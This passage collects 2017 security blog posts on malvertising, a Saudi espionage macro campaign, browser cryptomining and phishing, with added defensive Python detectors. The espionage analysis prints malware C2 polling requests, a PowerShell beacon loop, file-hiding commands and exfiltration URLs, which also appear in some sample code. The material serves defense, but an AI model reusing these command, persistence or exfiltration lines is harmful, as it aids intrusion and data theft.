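    "another-news.example": {"203.0.113.5"},
    "scam-landing.example": {"203.0.113.5"},
    "unrelated-shop.example": {"198.51.100.20"},
}


def build_graph(whois, pdns):
    """Undirected graph: domain nodes joined to 'email:<x>' and 'ip:<x>' nodes.
    A walk that passes through an email or ip node is a pivot on that attribute."""
    adj = {}

    def link(a, b):
        adj.setdefault(a, set()).add(b)
        adj.setdefault(b, set()).add(a)

    for dom, email in whois.items():
        if email:  # unknown registrants contribute no edge
            link(dom, "email:" + email)
    for dom, ips in pdns.items():
        for ip in ips:
            link(dom, "ip:" + ip)
    return adj


def pivot(adj, start, max_pivots=4):
    """Breadth-first walk from a seed domain. Returns {domain: path}, where
    the path alternates domain and attribute nodes, for every other domain
    reachable within max_pivots attribute hops."""
    paths = {start: [start]}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if len(paths[node]) > 2 * max_pivots:
            continue
        for nxt in adj.get(node, ()):
            if nxt not in paths:
                paths[nxt] = paths[node] + [nxt]
                queue.append(nxt)
    return {n: p for n, p in paths.items() if ":" not in n and n != start}


if __name__ == "__main__":
    graph = build_graph(WHOIS, PDNS)
    for dom, path in sorted(pivot(graph, "scam-landing.example").items()):
        print(dom, "via", " -> ".join(path[1:-1]))
```

Reading the paths is the point: every linked domain comes with the attribute nodes that connect it, so "same IP" and "same registrant" pivots are stated explicitly rather than inferred, and a domain that merely shares a large shared-hosting IP can be spotted and discounted.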

Banner ads versus native advertising

Banner ads can load third-party tags that are laced with malicious content, not to mention promoting anything that is outrageous (regardless of whether it has anything to do with the current content) and is bound to get clicks. For instance, there have been many documented instances of fake celebrity deaths used for click bait purposes on Facebook.

But promoted stories aren’t necessarily that different (or safer) when they take the user to a third-party website that is in the complete control of an advertiser, good or bad.

Users should be aware that even on a trusted platform, they should watch what they click on and be careful of sensationalist stories that may be used as click bait.

We reported the fraudulent advertiser to Taboola which told us they had opened an internal review of this particular vendor. We reached back with more questions regarding how Taboola deals with click bait and fake news, whether they scan articles for malware or scams, and finally if they had a direct point of contact to report security-related issues. However, we only received a response for the fake news problem, which you can read more about here.

The post Tech support scammers abuse native ad and content provider Taboola to serve malvertising appeared first on Malwarebytes Labs.


Elaborate scripting-fu used in espionage attack against Saudi Arabia Government entity

Malwarebytes - Wed, 09/27/2017 - 01:06

This post was co-authored by David Sánchez and Jérôme Segura

We recently came across a campaign targeting a Saudi Arabia Government entity via a malicious Word document which at first reminded us of an attack we had previously described on this blog.

In our previous research, we detailed how an information stealer Trojan was deployed via a Word macro, in order to spy on its victims (various parts of the Saudi Government). The stolen information was transmitted back to the threat actors’ infrastructure in an encrypted format.

This new threat also uses a macro to infect the target’s computer, but rather than retrieving a binary payload, it relies on various scripts to maintain its presence and to communicate via hacked websites, acting as proxies for the command and control server.

The malicious script fingerprints the victim’s machine and can receive any command that will run via PowerShell. In this blog post, we will describe the way this threat enters the system and maintains its presence while constantly communicating with its command and control server.

Covert delivery and persistence

The decoy document bears the logo of one of the branches of the Saudi Government and prompts the user to “Enable Content” stating that the document is in protected view (which is actually true).

A high-level static analysis of this document (the triage line below is in olevba’s summary format) reveals that it includes a macro as well as several Base64 encoded strings.

OLE:MAS--B-- target.doc (Flags: M=Macros, A=Auto-executable, S=Suspicious keywords, B=Base64 strings)

One of the first routines the malicious macro performs is to disable or lower security settings within Microsoft Excel and Word by setting the corresponding registry values to “1”, meaning Enable All: any macro-laden document opened later will then run without the usual warning.

The macro also fingerprints the victim’s IP address by querying the WMI class Win32_NetworkAdapterConfiguration:

It then proceeds to retrieve a stream of data from the Pastebin website using its own proxy:

The data is converted into two scripts, a PowerShell and a Visual Basic one, the latter being used for persistence on the infected machine via two different hook points: a Run key in the registry and a scheduled task.

This VBScript is really a launcher for the more important PowerShell script, and both are stored as hidden system files under the Documents folder using the following commands:

attrib +s +h "C:\Users\public\documents\NTSTATS.ps1"
attrib +s +h "C:\Users\public\documents\NTSTATS.vbs"

Espionage and exfiltration

That PowerShell script also has the same instructions to lower Office’s security settings but more importantly is used to exfiltrate data and communicate with the command and control server.

A unique ID is stored on the victim’s machine (in the same folder as the scripts) in a file called [username].key and is used to receive instructions via a server located in Germany (although it appears to be down at the time of writing).

GET http://144.76.109[.]88/al/?action=getCommand&id=[user ID] HTTP/1.1

A function called getKey retrieves the unique ID from the .key file stored on the local hard drive to register the machine as a new victim. If the key file does not exist, it queries for additional system information (computer name, IP address, OS version) and then creates that key (Set-Content $keypath $id).

Another function called getCommand uses the key as a parameter to then contact the C2. This command runs every 5 minutes:

while ($true) {
    getCommand $key
    start-sleep -Seconds 300
}

The malicious script can receive and run any command the attackers want via PowerShell, making this a very powerful attack.

The eventual exfiltration of data is done via several hardcoded websites acting as a proxy via the sendResult function:

The transmission of data is done via Base64 encoded strings, one for the user id (.key file) and one for the exfiltrated data.

GET /wp-content/wp_fast_cache/[removed]== HTTP/1.1
Host:
Connection: Keep-Alive

The parameters passed on the URL in the Base64 format:


Decoding the value in the variable “res”, we get the following info.

Connection-specific DNS Suffix . : [removed]
Description . . . . . . . . . . . : [removed]
Physical Address. . . . . . . . . : [removed]
DHCP Enabled. . . . . . . . . . . : [removed]
Autoconfiguration Enabled . . . . : [removed]

Script based attack and protection

This attack is very different from the typical malicious spam we see on a daily basis, blasting Locky or some banking Trojan. Indeed, there is no malicious binary payload (although one could be downloaded by the C2) which makes us think the attackers are trying to keep a low profile and remain on the system while collecting information from their target.

Relying on scripts as part of the attack chain and ongoing infection is an interesting concept because of how modular it is, not to mention more likely to stay undetected by antivirus engines. At the same time, it has to rely on various encoding techniques because it can’t make use of a packer like a traditional malware binary would.
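What a script-only implant cannot hide is its network behaviour: the getCommand poll every 300 seconds keyed by the victim id, and results pushed to hacked sites as Base64 inside the URL, both land in any proxy log. The Python below is an added example written for this page, not code from the post or from the malware. It builds a few constructed proxy-log lines (the C2 IP and one proxy host are copied from the IOC list; the client addresses, timestamps, victim id and exfiltrated text are made up), flags the fixed-interval polling, and decodes any URL component that turns out to be Base64 of ipconfig-style output.

```python
"""Spotting the beacon and exfil traffic described above in a proxy log."""
import base64
import re
import statistics
from collections import defaultdict
from urllib.parse import urlsplit

# ipconfig-style labels seen in the decoded exfil; any one of them is the trigger
FINGERPRINT_MARKERS = ("DNS Suffix", "Physical Address", "DHCP Enabled",
                       "Autoconfiguration Enabled", "Host Name")
# Standard or URL-safe Base64 body of at least 16 characters, optional padding
B64_RE = re.compile(r"^[A-Za-z0-9+/_-]{16,}={0,2}$")


def build_sample_log():
    """Constructed sample log, one line per request: "<epoch> <client_ip> <method> <url>".
    The C2 IP and the proxy host come from the article's IOC list; everything
    else (client IPs, timestamps, victim id, exfiltrated text) is made up."""
    uid = base64.b64encode(b"WS01-user-7f3a").decode()
    exfil = ("Connection-specific DNS Suffix . : corp.example\n"
             "Physical Address. . . . . . . . . : 00-11-22-33-44-55\n"
             "DHCP Enabled. . . . . . . . . . . : Yes\n")
    blob = base64.b64encode(exfil.encode()).decode()
    lines = [f"{1506470400 + 300 * i} 10.0.0.5 GET "
             f"http://144.76.109.88/al/?action=getCommand&id={uid}"
             for i in range(4)]
    lines.append("1506471610 10.0.0.5 GET "
                 f"http://wmg-global.com/wp-content/wp_fast_cache/{blob}")
    lines.append("1506471620 10.0.0.7 GET http://example.org/index.html")
    return lines


def _parse(lines):
    for line in lines:
        ts, src, _method, url = line.split(maxsplit=3)
        yield int(ts), src, url


def _query_pairs(query):
    """Split a query string by hand: parse_qs would turn '+' (a Base64 char) into a space."""
    pairs = []
    for kv in query.split("&"):
        if kv:
            key, _, value = kv.partition("=")
            pairs.append((key, value))
    return pairs


def _decode_b64_text(s):
    """Return the decoded text if s is Base64 that decodes to printable text, else None."""
    if not B64_RE.match(s):
        return None
    padded = s + "=" * (-len(s) % 4)
    for decode in (base64.b64decode, base64.urlsafe_b64decode):
        try:
            text = decode(padded).decode("utf-8")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            continue
        printable = sum(c.isprintable() or c in "\r\n\t" for c in text)
        if text and printable / len(text) > 0.95:
            return text
    return None


def find_beacons(lines, period=300, tolerance=30, min_hits=3):
    """Group getCommand polls by (client, C2 host, victim id) and flag regular intervals."""
    series = defaultdict(list)
    for ts, src, url in _parse(lines):
        u = urlsplit(url)
        q = dict(_query_pairs(u.query))
        if q.get("action") == "getCommand":
            series[(src, u.hostname, q.get("id"))].append(ts)
    beacons = []
    for (src, host, victim_id), stamps in series.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        median_gap = statistics.median(gaps)  # median survives one missed poll
        if abs(median_gap - period) <= tolerance:
            beacons.append({"src": src, "host": host, "id": victim_id,
                            "hits": len(stamps), "median_gap": median_gap})
    return beacons


def find_exfil(lines):
    """Flag URL components that are Base64 of host-fingerprint text."""
    hits = []
    for ts, src, url in _parse(lines):
        u = urlsplit(url)
        segments = u.path.split("/")
        # Every path tail is tried because standard Base64 may itself contain '/'
        candidates = ["/".join(segments[i:]) for i in range(1, len(segments))]
        candidates += [value for _, value in _query_pairs(u.query)]
        for cand in candidates:
            text = _decode_b64_text(cand)
            if text and any(marker in text for marker in FINGERPRINT_MARKERS):
                hits.append({"ts": ts, "src": src, "host": u.hostname, "decoded": text})
                break
    return hits


if __name__ == "__main__":
    log = build_sample_log()
    for b in find_beacons(log):
        print("beacon:", b)
    for h in find_exfil(log):
        print("exfil:", h["src"], "->", h["host"])
        print(h["decoded"])
```

The interval check uses the median gap so one dropped poll does not break the pattern, and the query string is split by hand because parse_qs would decode a '+' inside the Base64 into a space. Before alerting on this in production you would still allowlist known services that legitimately carry Base64 in URLs.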

Malwarebytes users are already protected against this attack thanks to our signature-less engine.

Indicators of compromise


C:\Users\public\documents\NTSTATS.ps1
C:\Users\public\documents\NTSTATS.vbs




larsson-elevator[.]com/plugins/xmap/com_k2/com.php?c=
spearhead-training[.]com/action/point2.php?c=
itcdubai[.]net/action/contact_gtc.php?c=
taxconsultantsdubai[.]ae/wp-content/themes/config.php?c=
[.]uk/Senditem.php?c=
wmg-global[.]com/wp-content/wp_fast_cache/
romix-group[.]com/modules/mod_wrapper/Senditem.php?c=
heartmade[.]ae/plugins/content/contact/Senditem.php?c=
arch-tech[.]net/components/com_layer_slider/Senditem.php?c=

The post Elaborate scripting-fu used in espionage attack against Saudi Arabia Government entity appeared first on Malwarebytes Labs.

Keychain vulnerability in macOS

Malwarebytes - Tue, 09/26/2017 - 18:11

On Monday, Patrick Wardle, a respected security researcher at Synack and owner of Objective-See, sent a tweet about a keychain vulnerability he had found in macOS High Sierra. As his tweet showed, it is possible for a malicious app to extract, and then exfiltrate, keychain data from High Sierra, with passwords clearly exposed in plain text.

In response to some questions, Wardle has also posted some additional information in an FAQ on Patreon.

This announcement set off a firestorm of articles on a variety of sites, which unfortunately caused a lot of FUD (fear, uncertainty, and doubt). In at least one case, I saw an article saying to hold off on installing High Sierra until this bug is fixed. It seems that many of these articles were written based solely on the contents of that tweet, but there is much more to be said.

It’s important to understand that the idea that people should wait to install High Sierra because of this bug is a very bad one, for multiple reasons.

First, as Wardle points out in his FAQ, this bug also affects Sierra and probably affects El Capitan as well. For all we know, it may go back further than that… only testing older systems can say for sure. So, you’ve probably got the vulnerability already anyway, whether you upgrade to High Sierra or not.

Second, installing updates and upgrades is an extremely important thing to do to keep yourself secure. If you don’t update, you don’t get important security fixes. If you skip upgrading to High Sierra because of one vulnerability (which you’re already vulnerable to anyway), that may mean that you will continue to be vulnerable to other issues that may have been fixed in High Sierra, but not in Sierra.

Keep in mind that the Mac fix for the extremely serious Broadpwn vulnerability was, apparently, only applied to macOS Sierra 10.12.6. So the old common knowledge that Mac security fixes go into the last three systems (El Capitan, Sierra, and High Sierra) does not seem to still be true, if it ever really was.

Third, let’s pretend for a moment that this was a vulnerability only affecting High Sierra. If you skip High Sierra, that implies that you think doing so makes you safe from keychain theft. Think again.

Consider, for example, the issue described in a blog post by Brenton Henry, in which a combination of an Apple tool and an AppleScript could be used to extract the contents of the keychain. That issue exists on older systems, but not Sierra or High Sierra.

Not only is the issue described by Henry a vulnerability that still exists on older systems, it’s a known vulnerability. That means that any script kiddie capable of doing a Google search would be able to implement it; it’s not that hard to do. Nobody knows yet how the vulnerability found by Wardle works, only that it exists.

As another example, think about the compromise of the HandBrake app in May, which led to systems being infected with the Proton malware. In that case, Proton was able to successfully trick the user into providing their password, and then exfiltrated that and their keychain files (among other things), which could be unlocked using that same password in most cases.

There was also the case of an interesting sample of the Dok malware one of our researchers received in a junk e-mail, which used an open-source Python remote access tool (RAT) that had the capability to exfiltrate the keychain and convincingly phish a user’s password.

These last two examples would work on any system, including High Sierra since they involve theft of both the user’s password and the keychain files.

Don’t get me wrong, this is a very bad vulnerability, and Apple should fix it as soon as possible. However, it’s not a world-ending catastrophe, nor is it a good reason to avoid installing High Sierra. There will always be vulnerabilities. Keeping your system and your software up-to-date is one of the best ways you can cope with them.

The post Keychain vulnerability in macOS appeared first on Malwarebytes Labs.

Drive-by mining and ads: The Wild Wild West

Malwarebytes - Mon, 09/25/2017 - 17:16

There seems to be a trend lately for publishers to monetize their traffic by having their visitors mine for cryptocurrencies while on their site. The idea is that you are accessing content for free and in exchange, your computer (its CPU in particular) will be used for mining purposes.

The Pirate Bay started to run a miner on its site and later publicly acknowledged it. In other cases, the mining was a byproduct of malicious adverts or done via legitimate but compromised websites that are being injected with cryptomining code directly.

Needless to say, this practice is raising many eyebrows and not everyone is on the same page about whether this new business model could be a long-term replacement for ads (although most people agree that ads are often annoying and malicious).

But what exactly happens when publishers turn your PC into a miner and display ads at the same time? In this post, we take a look at what is arguably a bad mix.

Drive-by mining

Because mining happens in the browser via JavaScript without user interaction, we could compare it to drive-by downloads. As publishers need to retain the visitor’s attention so that the JavaScript code runs uninterrupted for as long as possible, this is where the type of content matters. We know that for example gaming or video streaming sites tend to keep people on their page much longer than others.

Figure 1: A streaming site that is (not so) silently mining cryptocurrency

There is one exception: in some cases, loading the JavaScript mining code once is enough, and the mining continues even after the user navigates to another site. This abuse technique affects Internet Explorer (the so-called zombie script) and was identified and reported, but not yet fixed, by Manuel Caballero.

This concept of mining digital currency via the browser is a little odd at first because it is well known how resource intensive mining can be, requiring powerful machines loaded with expensive hardware. While this is true for Bitcoin, it is not for other currencies that were designed for ordinary CPUs.

Take the Monero digital currency, whose CryptoNight proof-of-work was designed to be memory-hard and resistant to specialised hardware, so a standard CPU can mine it with little disadvantage compared to more advanced hardware. This opens the door to a large and still mostly untapped market comprised of millions of typical consumer machines.

Coinhive advertises itself as “A Crypto Miner for your Website” and enables website owners to quickly set up mining by using their JavaScript API. Without a doubt, it has gained very rapid adoption but unfortunately is already being abused.

Figure 2: JavaScript API/code from Coinhive on the client side used to mine cryptocurrency
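What the client-side code in Figure 2 boils down to is one script include from the miner’s host and one initialisation call carrying the publisher’s site key and an optional throttle (the share of CPU time the miner leaves idle; zero means it takes everything it can). The scanner below is an added example for this page, not Coinhive’s or Malwarebytes’ code: it parses a constructed HTML page, reports the library include and the initialisation call, and pulls out the site key and throttle. The call shapes (CoinHive.Anonymous, .User, .Token) follow Coinhive’s public API as documented at the time; the site key and the ad host in the sample page are placeholders.

```python
"""Scanning a page for browser-miner inclusion and initialisation."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hosts serving the miner library; illustrative, extend as new services appear
MINER_HOSTS = ("coinhive.com",)
# new CoinHive.Anonymous(siteKey, {...}) / .User(siteKey, user, {...}) / .Token(siteKey, hashes, {...})
MINER_INIT_RE = re.compile(r"new\s+CoinHive\.(Anonymous|User|Token)\s*\(([^)]*)\)")
SITEKEY_RE = re.compile(r"""^\s*['"]([^'"]+)['"]""")
THROTTLE_RE = re.compile(r"throttle\s*:\s*([0-9]*\.?[0-9]+)")

# Constructed page: miner library, a (placeholder) ad tag, a video and the miner start
SAMPLE_PAGE = """<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script src="https://cdn.ads.example/tag.js"></script>
</head><body>
<video controls src="stream.mp4"></video>
<script>
  var miner = new CoinHive.Anonymous('EXAMPLE_SITE_KEY_0123456789abcdef', {throttle: 0.3});
  miner.start();
</script>
</body></html>
"""


class _ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.srcs, self.inline = [], []
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.srcs.append(src)
        else:
            self._in_inline, self._buf = True, []

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_inline:
            self.inline.append("".join(self._buf))
            self._in_inline = False

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)


def _host_of(src):
    if src.startswith("//"):          # protocol-relative include
        src = "https:" + src
    return (urlsplit(src).hostname or "").lower()


def scan_html(html):
    """Return findings for miner library includes and miner initialisation calls."""
    p = _ScriptCollector()
    p.feed(html)
    p.close()
    findings = []
    for src in p.srcs:
        host = _host_of(src)
        if any(host == h or host.endswith("." + h) for h in MINER_HOSTS):
            findings.append({"type": "miner-lib", "src": src})
    for body in p.inline:
        for m in MINER_INIT_RE.finditer(body):
            args = m.group(2)
            key = SITEKEY_RE.match(args)
            thr = THROTTLE_RE.search(args)
            findings.append({
                "type": "miner-init",
                "mode": m.group(1),
                "site_key": key.group(1) if key else None,
                # throttle absent means 0: the miner may use all available CPU
                "throttle": float(thr.group(1)) if thr else 0.0,
            })
    return findings


if __name__ == "__main__":
    for f in scan_html(SAMPLE_PAGE):
        print(f)
```

The site key is worth recording: it identifies the account being paid, which is how the same operator can be tied to many compromised or complicit sites. Scripts that are loaded dynamically or assembled at runtime will not be caught by a static parse like this one; a blocker working at the network layer, on the miner’s hostnames, does not have that problem.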

Gaming and video sites are typically resource intensive already, so running a miner on top of them without a noticeable impact seems hard to do. Having said that, many people who consume copyrighted content are perhaps less likely to complain about a below-par user experience.

The question at this point is: How far can publishers push the limits towards a really bad user experience? You may be surprised that for many, this is not really a problem at all and that double dipping is, in fact, a fairly common practice.

Forced mining and malvertising

The same site pictured above was not only monetizing via Coinhive, but they also ran adverts. Clicking anywhere on the page – including the ‘Play’ button on the video – triggered a pop under advert that ran through various ad exchanges and resulted in malvertising in almost all instances, leading to tech support scams and several different exploit kit infection chains.

Tech support scams

Tech support scams are one of the most common redirections we see these days. While they do not usually infect your computer, they are still a threat to consider. The most common symptom is referred to as ‘Browlock’ because scammers use code that prevents you from closing your browser normally. The claims are always excessive and designed to scare users about made-up infections. Victims who call the posted number for help end up with more computer issues and several hundred dollars less in their wallet.

Figure 3: Malvertising leading to tech support scam (Browlock) is triggered when clicking anywhere on the page

Figure 4: Web traffic showing redirection sequence from publisher to tech support scam page

RIG exploit kit

RIG is the most popular exploit kit these days and malvertising is its prime delivery mechanism. Victims are filtered using the same tools that marketers have to profile consumers, and there can be a secondary level of filtering, usually via a gate that performs geolocation checks for example.

Figure 5: RIG EK via malvertising chain

Terror exploit kit

Terror EK is on a much smaller distribution scale than RIG but is still a fairly active exploit kit that tries out different things. For instance, some Terror EK infection chains use HTTPS (TLS, via free certificates from Let’s Encrypt), which keeps the landing page out of plain-text inspection. It also has an interesting gate with one of the most convoluted iframe encodings we have seen.

Figure 6: Terror EK via malvertising, and gate before landing page

Block less or more?

One of the first reactions to the rise of browser cryptominers was to ask how to block them, whether with a typical ad blocker or URL/IP blacklist and even by disabling JavaScript. There’s no question that users are annoyed by a rollout that did not include their opinion, even though many were actually favorable to this alternate solution to online ads.

While cryptominers do have an impact on system resources, there was at least a sense that they may be safer and less intrusive than ads. But publishers ought to be more transparent with their audience because no-one likes unannounced guests. Unfortunately, there will always be publishers that care very little about what kind of traffic they push, so long as it generates good revenues; for those, cryptominers are just an added income to their existing advertising portfolio.

Malwarebytes users are already protected against this drive-by mining. In fact, we are blocking over 5 million connection attempts to Coinhive every single day, which shows that browser-based mining has really taken off in a big way.

Our goal is to protect people from unsolicited drive-by cryptomining. However, for those users that are aware and want to participate in mining, they can absolutely do so by adding an exclusion for this domain.

Indicators of compromise

Tech support scam
192.241.220[.]40/877microsoft/

RIG EK
Fobos: hudsonentertainment[.]info/
Fobos: 204hdchdhhh[.]cf/tako/?re=6128546021
RIG IP: 188.225.83[.]85
43bc543d26f755474b355a70c25077df8ab71836056619216792a112a79bcd3d

Terror EK
onpakfucli.salary-radar[.]bid/search-w3kpShD3axxD/R5ALkH3JyPBC/rzcp4YrhDgzu.html
wabusfqdty.salary-radar[.]bid/search-w3kpShD3axxD/iqW1OavoNisD.php
4fccf7246b6807e22c42dd93507592cca0594694f4487b03db04ef13e7a99c54

The post Drive-by mining and ads: The Wild Wild West appeared first on Malwarebytes Labs.

A week in security (September 18 – September 24)

Malwarebytes - Mon, 09/25/2017 - 16:24

Last week, we kept you updated on our blog about the infected versions of CCleaner that were offered as downloads on the official servers.

We also warned you against a fake IRS notice that delivers a customized spying tool, some of the threats currently facing gamers, and a Netflix scam that has been doing the rounds in Europe.

Mac users learned how to tell if their Mac is infected and Advanced Tech Support victims learned how to apply for a (partial) refund.


Consumer news

Business news


Stay safe!

Malwarebytes Labs Team

The post A week in security (September 18 – September 24) appeared first on Malwarebytes Labs.

Netflix scam warning

Malwarebytes - Fri, 09/22/2017 - 17:32
Always be on your toes

While we are used to receiving scam attempts pretending to be from banks, online shops, credit card companies, and international courier services that does not mean all the other emails are safe. Far from it. To demonstrate this point we will show you a scam aimed at Netflix customers which has been used in the Netherlands and is now doing the rounds in the UK but could just as easily spread to the US.

The mail in question

The sender address, in this case, was supportnetflix@checkinformation[.]com and the content of the email informs us that there has been a problem with our last payment. Obviously to those of us who are not customers of Netflix this is the first red flag. The fact that the domain name checkinformation[.]com does not belong to Netflix is another big red flag. In fact, the domain is for sale at the moment of writing.


Account disabled!

Dear User,

We’re having some trouble with your current billing information. We’ll try again. But in the meantime you may want to update your payment details. During the next login process, you will be required to provide some informations like (billing info, phone number, payment info)


So the email asks us to fill out our payment details on a site, via a button in the message. This should always be a red flag. A security-aware company will tell you to log into its site yourself and then explain how to proceed; it will not send you a direct link to a page with a form asking for billing information and the like.

Pay attention to

When you have to provide such details, always look for the green padlock in the address bar of your browser, and read the domain name next to it.

Remember that the green padlock is not the sole condition, but it is a must before you proceed. It only tells you that the connection to the site named in the address bar is encrypted; it says nothing about whether that site is the one it claims to be, and phishing sites obtain certificates as easily as anyone else. The domain name is what you have to check.

Another telltale sign is spelling errors, but again, the lack of them is not a definite green light to proceed. Scammers have learned that their efficiency goes up if they pay attention to their spelling.

Also never judge a site by its looks, because phishers are masters in the art of copying the layout and images from legitimate sites. In fact, they often hotlink the real images and stylesheets of the website they are pretending to be, so the copy is pixel-perfect.
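The checks in this section (who really sent the mail, where the button really goes, and whether that domain is the brand’s own) can be made mechanical. The Python below is an added example for this page, not something from the original post: it parses two constructed messages, one modelled on the scam above (the sender domain is the one quoted in the post; the link target uses the reserved .example TLD) and one legitimate-looking control, and reports sender and link domains that do not belong to the brand the mail claims to come from. The brand-to-domain table and the registrable-domain helper are simplifications for illustration.

```python
"""Checking a brand-themed email's sender and links against the brand's real domain."""
import email
import re
from email import policy
from urllib.parse import urlsplit

# Assumed mapping for illustration; a real deployment maintains this list per brand
BRAND_DOMAINS = {"netflix": ("netflix.com",)}
HREF_RE = re.compile(r"""href\s*=\s*["']([^"']+)["']""", re.I)

# Constructed message modelled on the scam above (sender domain as quoted in the post)
SAMPLE_PHISH = """\
From: "Netflix Support" <supportnetflix@checkinformation.com>
To: user@example.org
Subject: Account disabled!
Content-Type: text/html; charset="utf-8"

<html><body><p>Dear User,</p>
<p>We're having some trouble with your current billing information.</p>
<p><a href="http://netflix-billing-update.example/login">Update payment details</a></p>
</body></html>
"""

# Constructed control: sender subdomain and link both under the brand's real domain
SAMPLE_LEGIT = """\
From: Netflix <info@mailer.netflix.com>
To: user@example.org
Subject: Your monthly invoice
Content-Type: text/html; charset="utf-8"

<html><body><p>View your account at
<a href="https://www.netflix.com/YourAccount">netflix.com</a>.</p></body></html>
"""


def registrable_domain(host):
    """Crude eTLD+1: last two labels, or three for co.uk-style suffixes.
    Use the Public Suffix List in anything real."""
    parts = host.lower().rstrip(".").split(".")
    if (len(parts) >= 3 and len(parts[-1]) == 2
            and parts[-2] in ("co", "com", "org", "net", "gov", "ac")):
        return ".".join(parts[-3:])
    return ".".join(parts[-2:])


def assess_message(raw):
    """Return (finding, detail) tuples; an empty list means nothing suspicious was found."""
    msg = email.message_from_string(raw, policy=policy.default)
    sender = msg["From"].addresses[0]
    subject = str(msg["Subject"] or "")
    body = msg.get_body(preferencelist=("html", "plain"))
    html = body.get_content() if body else ""
    # Which brand does the mail claim to be from? Look at what the reader sees.
    visible = " ".join([sender.display_name, sender.username, subject,
                        re.sub(r"<[^>]+>", " ", html)]).lower()
    brand = next((b for b in BRAND_DOMAINS if b in visible), None)
    if brand is None:
        return []  # no known brand claimed, nothing to compare against
    legit = BRAND_DOMAINS[brand]
    findings = []
    if registrable_domain(sender.domain) not in legit:
        findings.append(("sender-domain-mismatch", sender.addr_spec))
    for href in HREF_RE.findall(html):
        u = urlsplit(href)
        if u.scheme not in ("http", "https"):
            continue
        if registrable_domain(u.hostname or "") not in legit:
            findings.append(("link-domain-mismatch", href))
        if u.scheme == "http":
            findings.append(("no-tls", href))
    return findings


if __name__ == "__main__":
    for name, raw in (("phish", SAMPLE_PHISH), ("legit", SAMPLE_LEGIT)):
        print(name, assess_message(raw))
```

Note what the "no-tls" finding does and does not mean: an https link to a look-alike domain is still caught, by the domain mismatch, because the certificate proves nothing about who owns the name. The From header is also trivially forgeable, so in a mail gateway this check belongs alongside SPF/DKIM/DMARC results rather than in place of them.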


The Guardian: Watch out for Netflix email scam that looks like the real deal

In January another Netflix scam was analyzed by FireEye.

Guideline to help determine whether a website is legitimate.


Pieter Arntz

The post Netflix scam warning appeared first on Malwarebytes Labs.

Don’t let these gaming threats give you a Game Over

Malwarebytes - Thu, 09/21/2017 - 20:24

With EGX, the biggest gaming event in the UK opening its doors today, we thought it’d be timely to remind you of some of the threats currently facing gamers. No matter what type of game, client, or system you use, there’s always something waiting to try and give you a bad day where the safety of your account is concerned.

GTAV cash generators

Some games, like GTAV, involve an amount of “grinding” (performing potentially repetitive tasks) to get what you want. In this case, incredibly expensive items/additional content which are free to download, but cost in-game money to make use of. In GTAV, you can buy in-game currency with real money to speed up the process, grind, or turn to the internet in search of free money tools. While modders in game sessions can – and do – spawn money from the sky, or only add cash to your account, the huge pile of YouTube videos and web comments claiming to offer free services online are all fake. The so-called money generators are merely survey scams, which lead to requests for personal information or downloadable files (which may or may not be malicious).

Steam scams

These are very popular, especially with accounts being able to buy and sell (expensive) digital items for various titles, adding extra desirability for scammers wanting to make a quick buck. Phishing is a mainstay of Steam scams; other attacks, such as swiping a Steam SSFN file to bypass Steam Guard, are much more sophisticated. Be wary of fake item trades, especially if they don’t lead to an official Steam URL – you may well be looking at a static phishing page, or one which scrapes some elements from the real thing to appear legitimate.

Read: Something’s phishy: How to detect phishing attempts


Swatting

The act of sending armed law enforcement round to a game streamer’s house, which could potentially be fatal. Streamers usually get caught by this by being too open with their personal information – quite often, you’ll find out all you need to know about your target simply by listening to them stream. Before you know it, they’ll have casually mentioned locations, even nearby streets where their friends live, and much more besides. Calls to said friends pretending to be someone else, for example, will fill in the missing pieces of the puzzle.

Ironically, the main way to avoid swatting (for the most part) is to tell people who make a living out of talking to stop talking about themselves, at least a little. This is no guarantee of safety; many other ways exist to obtain a home address from publicly available information. All in all, streaming is a bit of a dangerous pastime.

Game company hacks

There’s not a huge amount you can do when the gatekeepers of your data get popped, but that doesn’t mean you should be complacent. Many game companies and hardware makers now offer additional forms of security such as key fobs and two-factor authentication, which you should make use of whenever possible. You may also wish to use a password manager to ensure you’re not just reusing the same passwords everywhere, which could lead to additional compromises. Modern gaming can require multiple passwords across different gaming platforms just to play one game, so it’s fairly common to see video game password burnout – don’t fall for it!

Fake emulators

It’s becoming increasingly difficult to obtain old game consoles, much less play the original titles. Even on consoles where backwards compatibility exists, titles differ from how they were originally: licensed music has been replaced, the control scheme is different, or the game works on this console but not properly on that mobile device, and it is funded by ads besides.

Entering stage left: fake emulators. It is still challenging to emulate most of the last generation (or two) of consoles, and you should be extremely wary where such claims are concerned.

These are some of the most common problems we see on a daily basis in gaming land; feel free to offer up some of the scams you’ve seen doing the rounds in the comments below. Safe gaming!


The Malwarebytes Labs Team

The post Don’t let these gaming threats give you a Game Over appeared first on Malwarebytes Labs.

Fake IRS notice delivers customized spying tool

Malwarebytes - Thu, 09/21/2017 - 15:00

While macro-based documents and scripts make up the majority of malspam attacks these days, we also see some campaigns that leverage documents embedded with exploits. Case in point, we came across a malicious Microsoft Office file disguised as a CP2000 notice. The Internal Revenue Service (IRS) usually mails out this letter to taxpayers when information is incorrectly reported on a previous return.

Victims that fall for the scam will infect themselves with a custom Remote Administration Tool. A RAT can be utilized for legitimate purposes, for example by a system administrator, but it can also be used without a user’s consent or knowledge to remotely control their machine, view and delete files or deploy a keylogger to silently capture keystrokes.

In this blog post, we will review this exploit’s delivery mechanism and take a look at the remote tool it deploys.


The malicious document is hosted on a remote server and users are most likely enticed to open it via a link from a phishing email. The file contains an OLE2 embedded link object which retrieves a malicious HTA script from a remote server and executes it. In turn, that script downloads the final payload, all with very little user interaction required because the document abuses CVE-2017-0199, a logic flaw in how Office handles OLE2link objects (the remote content is handed to the HTA handler and run), first uncovered in April 2017 as a zero-day.


The embedded link points to an HTA script hosted under an unexpected location – a Norwegian company’s compromised FTP server – which invokes PowerShell to download and execute the actual malware payload.

